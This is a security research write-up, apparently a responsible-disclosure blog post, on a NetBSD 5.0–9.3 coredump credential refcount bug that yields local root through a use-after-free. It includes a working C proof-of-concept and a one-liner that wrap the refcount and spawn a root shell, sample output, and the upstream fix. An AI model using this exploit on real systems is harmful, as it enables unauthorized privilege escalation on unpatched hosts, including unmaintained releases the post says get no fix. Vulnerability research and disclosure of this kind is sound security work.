Crash Override: NetBSD 5.0-9.3 Coredump Kernel Refcount LPE
chrisIntroduction
NetBSD 5.0 (released 2009) introduced a change to the in-kernel coredump handler that accidentally introduced a reference count bug on the crashing process' credential.
Triggering the vulnerability leads to a use-after-free that can be trivially (though slowly) exploited to achieve local privilege escalation, gaining root from an unprivileged starting point.
This article will discuss the simplicity of both the vulnerability and exploitation strategy, leading onto a functional proof of concept exploit.
The vulnerability affects all versions of NetBSD from 5.0 through to 9.3 and can be exploited in an architecture-independent manner. A fix was pushed to branches for NetBSD 8.x and NetBSD 9.x followed by advisory release soon afterwards.
Special thanks to Christos Zoulas of NetBSD for keeping me personally updated, authoring and pushing through the relevant advisory.
Vulnerability Overview
Coredumps are created for processes when they appear to have unexpectedly
terminated. The idea is to capture as much debug information as possible to
assist somebody in diagnosing what actually happened and why. These coredumps
are usually written to disk in the current working directory of the process
with a .core
file extension.
We can see the jumping off point for invoking any registered coredump handler in the guts of the signal handling code:
/*
* Force the current process to exit with the specified signal, dumping core
* if appropriate. We bypass the normal tests for masked and caught
* signals, allowing unrecoverable failures to terminate the process without
* changing signal state. Mark the accounting record with the signal
* termination. If dumping core, save the signal number for the debugger.
* Calls exit and does not return.
*/
void
sigexit(struct lwp *l, int signo)
{
int exitsig, error, docore;
...
[1] if ((docore = (sigprop[signo] & SA_CORE)) != 0) {
...
if (docore) {
mutex_exit(p->p_lock);
[2] MODULE_HOOK_CALL(coredump_hook, (l, NULL), enosys(), error);
If a signal is configured to force an exit of the process then we end up in
this sigexit
function. Further, if the specific signal has been configured
to trigger a coredump [1] then we reach a call to whatever coredump_hook
has
been configured [2].
There is only one coredump handler registered in the NetBSD codebase:
MODULE_HOOK_SET(coredump_hook, coredump);
The coredump
function describes itself well and is pretty simple:
/*
* Dump core, into a file named "progname.core" or "core" (depending on the
* value of shortcorename), unless the process was setuid/setgid.
*/
static int
coredump(struct lwp *l, const char *pattern)
{
struct vnode *vp;
struct proc *p;
struct vmspace *vm;
kauth_cred_t cred;
struct pathbuf *pb;
struct vattr vattr;
struct coredump_iostate io;
struct plimit *lim;
int error, error1;
char *name, *lastslash;
...
/*
* It may well not be curproc, so grab a reference to its current
* credentials.
*/
[3] kauth_cred_hold(p->p_cred);
cred = p->p_cred;
...
[4] pb = pathbuf_create(name);
if (pb == NULL) {
error = ENOMEM;
goto done;
}
[5] error = vn_open(NULL, pb, 0, O_CREAT | O_NOFOLLOW | FWRITE,
S_IRUSR | S_IWUSR, &vp, NULL, NULL);
if (error != 0) {
pathbuf_destroy(pb);
[6] goto done;
}
...
[7] done:
if (name != NULL)
PNBUF_PUT(name);
return error;
}
One of the first things the function does is hold onto the crashing process' credential [3]. This takes a reference on it so that it can't go away while it's being dealt with.
Omitted from the snippet here is the logic for building up the corefile name.
Once it has been built, the function goes on to create a pathbuf
from it [4]
and then tries to open that path for writing through vn_open
at [5].
If that vn_open
fails for any reason — for instance, if the crashing
process doesn't have permission to create files in the current directory —
then the code jumps to done
[6].
At done
, we expect to see the cleanup code for the failed coredump attempt
[7]. The name
pathname buffer is indeed put, but nothing else happens here.
Importantly, the reference taken on the credential at [3] is never released. In fact, none of the error or success paths seem to do this.
This is the vulnerability: it's a classic refcount bug that we can trigger by crashing one of our processes.
Exploitability Analysis
To understand whether this refcount bug is exploitable, we need to ensure that
a wrap of the refcount won't be detected or prevented. We can find that out
by looking at the kauth_cred_hold
function:
/* Increment reference count to cred. */
void
kauth_cred_hold(kauth_cred_t cred)
{
KASSERT(cred != NULL);
KASSERT(cred != NOCRED);
KASSERT(cred != FSCRED);
KASSERT(cred->cr_refcnt > 0);
[1] atomic_inc_uint(&cred->cr_refcnt);
}
We see here that atomic_inc_uint
is used to increment the reference count
[1]. That will not detect the wrap. The KASSERT
s in this function are also
essentially nops for anything other than debug kernels, so we can ignore them.
Also worth noting is that cr_refcnt
is a u_int
. That's 32 bits wide on
the platforms we probably care about, which means that wrapping the count is
feasible.
Assuming we can wrap the reference count and trigger a path that decrements it
afterwards, what happens? We can answer that by looking at the responsible
function, kauth_cred_free
:
/* Decrease reference count to cred. If reached zero, free it. */
void
kauth_cred_free(kauth_cred_t cred)
{
KASSERT(cred != NULL);
KASSERT(cred != NOCRED);
KASSERT(cred != FSCRED);
KASSERT(cred->cr_refcnt > 0);
ASSERT_SLEEPABLE();
#ifndef __HAVE_ATOMIC_AS_MEMBAR
membar_release();
#endif
[2] if (atomic_dec_uint_nv(&cred->cr_refcnt) > 0)
return;
#ifndef __HAVE_ATOMIC_AS_MEMBAR
membar_acquire();
#endif
kauth_cred_hook(cred, KAUTH_CRED_FREE, NULL, NULL);
specificdata_fini(kauth_domain, &cred->cr_sd);
[3] pool_cache_put(kauth_cred_cache, cred);
}
This function decrements the refcount and, if it's still positive [2], just returns out.
If the refcount did drop to zero then a little tidying up is done before
putting the credential back into the kauth_cred_cache
[3].
This is an interesting point to note: kauth_cred_t
s are allocated from their
own dedicated pool and not the general purpose heap. This fact informs our
exploit development process.
I admit to knowing next to nothing about the NetBSD kernel heaps. Even so, without knowing any of the internals, we can make an educated guess that it probably works in a last-in, first-out (LIFO) fashion as most kernel heap implementations tend to.
Exploitation Strategy
We need to think about how we might exploit this:
- Trigger the vulnerability to wrap the
kauth_cred_t
refcount to 1. - Cause
kauth_cred_free
to get called somehow. - Have a privileged
kauth_cred_t
allocated in its place.
If we assume the kernel heap operates on a LIFO basis, this should be enough
to elevate our privileges. So what could be a convenient way of calling
kauth_cred_free
on our credential?
One very simple observation is that kauth_cred_free
is called when a process
is reaped. This leads to a nice simple strategy of looping doing:
- Fork.
- In the child, trigger a coredump (e.g. through
abort(3)
). - In the parent, reap the child through
wait(2)
.
Eventually that reap at step 3 will drop the kauth_cred_t
reference from its
wrapped value of 1 down to 0 and cause it to be freed, leaving the parent
process with a dangling credential on its process (p->p_cred
).
With a dangling kauth_cred_t
pointer, our next job is to allocate a
privileged credential in its place. How could we do that? Amusingly, it
turns out that we can just call setuid(0);
and magically become root. :)
Let's start out by looking at sys_setuid
:
/* ARGSUSED */
int
sys_setuid(struct lwp *l, const struct sys_setuid_args *uap, register_t *retval)
{
/* {
syscallarg(uid_t) uid;
} */
uid_t uid = SCARG(uap, uid);
[1] return do_setresuid(l, uid, uid, uid,
ID_R_EQ_R | ID_E_EQ_R | ID_S_EQ_R);
}
Most of the core logic of the various setuid
functions is actually
implemented by the do_setresuid
function [1].
/*
* Set real, effective and saved uids to the requested values.
* non-root callers can only ever change uids to values that match
* one of the processes current uid values.
* This is further restricted by the flags argument.
*/
int
do_setresuid(struct lwp *l, uid_t r, uid_t e, uid_t sv, u_int flags)
{
struct proc *p = l->l_proc;
kauth_cred_t cred, ncred;
[2] ncred = kauth_cred_alloc();
/* Get a write lock on the process credential. */
proc_crmod_enter();
[3] cred = p->p_cred;
/*
* Check that the new value is one of the allowed existing values,
* or that we have root privilege.
*/
if ((r != -1
&& !((flags & ID_R_EQ_R) && r == kauth_cred_getuid(cred))
&& !((flags & ID_R_EQ_E) && r == kauth_cred_geteuid(cred))
&& !((flags & ID_R_EQ_S) && r == kauth_cred_getsvuid(cred))) ||
(e != -1
&& !((flags & ID_E_EQ_R) && e == kauth_cred_getuid(cred))
&& !((flags & ID_E_EQ_E) && e == kauth_cred_geteuid(cred))
&& !((flags & ID_E_EQ_S) && e == kauth_cred_getsvuid(cred))) ||
(sv != -1
&& !((flags & ID_S_EQ_R) && sv == kauth_cred_getuid(cred))
&& !((flags & ID_S_EQ_E) && sv == kauth_cred_geteuid(cred))
&& !((flags & ID_S_EQ_S) && sv == kauth_cred_getsvuid(cred)))) {
int error;
error = kauth_authorize_process(cred, KAUTH_PROCESS_SETID,
p, NULL, NULL, NULL);
if (error != 0) {
proc_crmod_leave(cred, ncred, false);
return error;
}
}
/* If nothing has changed, short circuit the request */
[4] if ((r == -1 || r == kauth_cred_getuid(cred))
&& (e == -1 || e == kauth_cred_geteuid(cred))
&& (sv == -1 || sv == kauth_cred_getsvuid(cred))) {
[5] proc_crmod_leave(cred, ncred, false);
return 0;
}
...
The very first thing that happens in this function is a new credential,
ncred
, is allocated [2]. We also pull out the pointer to the current
credential, cred
[3].
Given that the kernel heap is LIFO and p->p_cred
is dangling, we actually
end up in the situation where ncred == cred
. So p->p_cred
is now pointing
to whatever kauth_cred_alloc
returned:
/* Allocate new, empty kauth credentials. */
kauth_cred_t
kauth_cred_alloc(void)
{
kauth_cred_t cred;
cred = pool_cache_get(kauth_cred_cache, PR_WAITOK);
cred->cr_refcnt = 1;
cred->cr_uid = 0;
cred->cr_euid = 0;
cred->cr_svuid = 0;
cred->cr_gid = 0;
cred->cr_egid = 0;
cred->cr_svgid = 0;
cred->cr_ngroups = 0;
specificdata_init(kauth_domain, &cred->cr_sd);
kauth_cred_hook(cred, KAUTH_CRED_INIT, NULL, NULL);
return (cred);
}
Aha, that just happens to be a nice pure root cred. :)
With both ncred
and cred
pointing to a pure root cred, we skip over the
first big if-statement in do_setresuid
and land at [4]. The conditions at
[4] now check out and we call proc_crmod_leave
before returning success to
userland.
We are now magically root.
An important side note here is that our p->p_cred
is actually still dangling:
that's because the call to proc_crmod_leave
drops a reference on one of the
cred arguments. Since the cred has a refcount of 1 at this point, a free will
occur.
But that's okay as long as we're careful: figuring out how to secure our access and leave the system in a stable state from this point is academic. For our proof of concept, just doing this will be fine.
The final process is:
-
Loop while
setuid(0)
fails:- Fork.
- In the child, call
abort(3)
to trigger a coredump. - In the parent, call
wait(2)
to reap the child.
- If we've exited the loop, we're now root, so drop to a shell.
Visualisation
Some ASCII art can help visualise this process. After many coredumps, we end
up with our kauth_cred_t
's cr_refcnt
being zero:
Now when this child triggers a coredump, we end up with yet another reference taken:
Since coredump
bumps the refcount to 1 and leaves it there, when the parent
process now comes to reap the child, kauth_cred_free
will see cr_refcnt
drop to zero and free the cred:
Now our process' p_cred
points to something that still looks like a cred,
but it's actually been freed.
Calling setuid(0);
now will allocate that same virtual address, overwrite
it, find that we already appear to be root and return success (freeing the
cred back again). That leaves us in this state:
Our p_cred
is still pointing to freed memory, but now it looks like a root
cred because of how do_setresuid
works. We're effectively root, even if
we are standing on thin ice at this point.
Proof of Concept Exploit
Here's the code with utility code omitted:
/*
* Crash Override: NetBSD 5.0-9.3 Coredump LPE PoC
* By [email protected] / 2022-Sep-06
*/
#include <machine/limits.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>
#include "libpoc.h"
const char *poc_title = "NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)";
const char *poc_author = "[email protected]";
int
main(int argc, char *argv[])
{
unsigned int n;
char * const av[] = { "/bin/sh", "-i", NULL };
char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };
banner();
log_info("Changing directory to /");
expect(chdir("/"));
log_info("Beginning refcount wrap");
for (n = 0; n < UINT_MAX; ++n) {
if (!(n & 0x000fffff)) {
log_progress("Progress: 0x%08x / ~0x%08x...", n, UINT_MAX);
}
if (!vfork()) {
abort();
} else {
expect(wait(NULL));
}
if (!setuid(0)) {
break;
}
}
log_progress_complete();
if (getuid() == 0) {
log_info("Success!");
expect(execve(av[0], av, ev));
}
log_fatal("Failed");
return 0;
}
A full PoC archive is provided at the end of the article.
We can also make this a terrible one-liner for which I can only apologise:
/* cc -o d d.c && ./d */
main(){while((vfork()||*(int*)0)&&(!wait(0)||setuid(0)));execl("/bin/sh","-i",0);}
Triggering this particular refcount bug takes some time since we're
continuously creating and destroying processes as we go. This was compounded
by the fact that my experiments were being done on an emulated amd64 QEMU VM;
all of my machines are Apple Silicon these days. vfork
helps substantially
over fork
, but it's still a multi-hour marathon to complete the wrap.
To simplify exploit development, I decided to cheat. I modified the kernel
coredump
function locally to wrap after p->p_cred->cr_refcnt
exceeded
200, then recompiled overnight. This gave me confidence that the bug was
real without being too expensive time-wise.
Once the technique was proven, I repeated against unmodified, clean installs for both NetBSD 9.3 and NetBSD 8.0 as those represented the span of currently-maintained releases at time of writing. The exploit succeeded just fine for both.
Here's some sample output of the PoC running:
$ uname -msr
NetBSD 9.3 amd64
$ make all && ./crash-override
cc -c -o crash-override.o crash-override.c
cc -c -o libpoc.o libpoc.c
cc -o crash-override crash-override.o libpoc.o
[+] NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)
[+] By [email protected]
[+] ---
[+] Changing directory to /
[+] Beginning refcount wrap
[+] Progress: 0xfff00000 / ~0xffffffff...
[+] Success!
# id
uid=0(root) gid=0(wheel)
# whoami
root
#
Fix
I reported the issue to the NetBSD Security Alert Team on the 6th of September, 2022. The issue was quickly fixed with the following patch:
diff --git a/sys/kern/kern_core.c b/sys/kern/kern_core.c
index c42bcfb229ea..22f47c894ae8 100644
--- a/sys/kern/kern_core.c
+++ b/sys/kern/kern_core.c
@@ -1,4 +1,4 @@
-/* $NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $ */
+/* $NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $ */
/*
* Copyright (c) 1982, 1986, 1989, 1991, 1993
@@ -37,7 +37,7 @@
*/
#include <sys/cdefs.h>
-__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $");
+__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $");
#ifdef _KERNEL_OPT
#include "opt_execfmt.h"
@@ -121,7 +121,7 @@ coredump(struct lwp *l, const char *pattern)
struct vnode *vp;
struct proc *p;
struct vmspace *vm;
- kauth_cred_t cred;
+ kauth_cred_t cred = NULL;
struct pathbuf *pb;
struct vattr vattr;
struct coredump_iostate io;
@@ -145,9 +145,7 @@ coredump(struct lwp *l, const char *pattern)
if (USPACE + ctob(vm->vm_dsize + vm->vm_ssize) >=
p->p_rlimit[RLIMIT_CORE].rlim_cur) {
error = EFBIG; /* better error code? */
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
/*
@@ -164,9 +162,7 @@ coredump(struct lwp *l, const char *pattern)
if (p->p_flag & PK_SUGID) {
if (!security_setidcore_dump) {
error = EPERM;
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
pattern = security_setidcore_path;
}
@@ -180,11 +176,8 @@ coredump(struct lwp *l, const char *pattern)
error = coredump_buildname(p, name, pattern, MAXPATHLEN);
mutex_exit(&lim->pl_lock);
- if (error) {
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
- }
+ if (error)
+ goto release;
/*
* On a simple filename, see if the filesystem allow us to write
@@ -198,6 +191,7 @@ coredump(struct lwp *l, const char *pattern)
error = EPERM;
}
+release:
mutex_exit(p->p_lock);
mutex_exit(&proc_lock);
if (error)
@@ -284,6 +278,8 @@ coredump(struct lwp *l, const char *pattern)
if (error == 0)
error = error1;
done:
+ if (cred != NULL)
+ kauth_cred_free(cred);
if (name != NULL)
PNBUF_PUT(name);
return error;
We can see that the fix correctly adds the missing kauth_cred_free
call to the exit path.
The patch was made for NetBSD 8.x and 9.x; releases prior to NetBSD 8.0 are not maintained per the NetBSD maintenance policy and so won't receive the fix.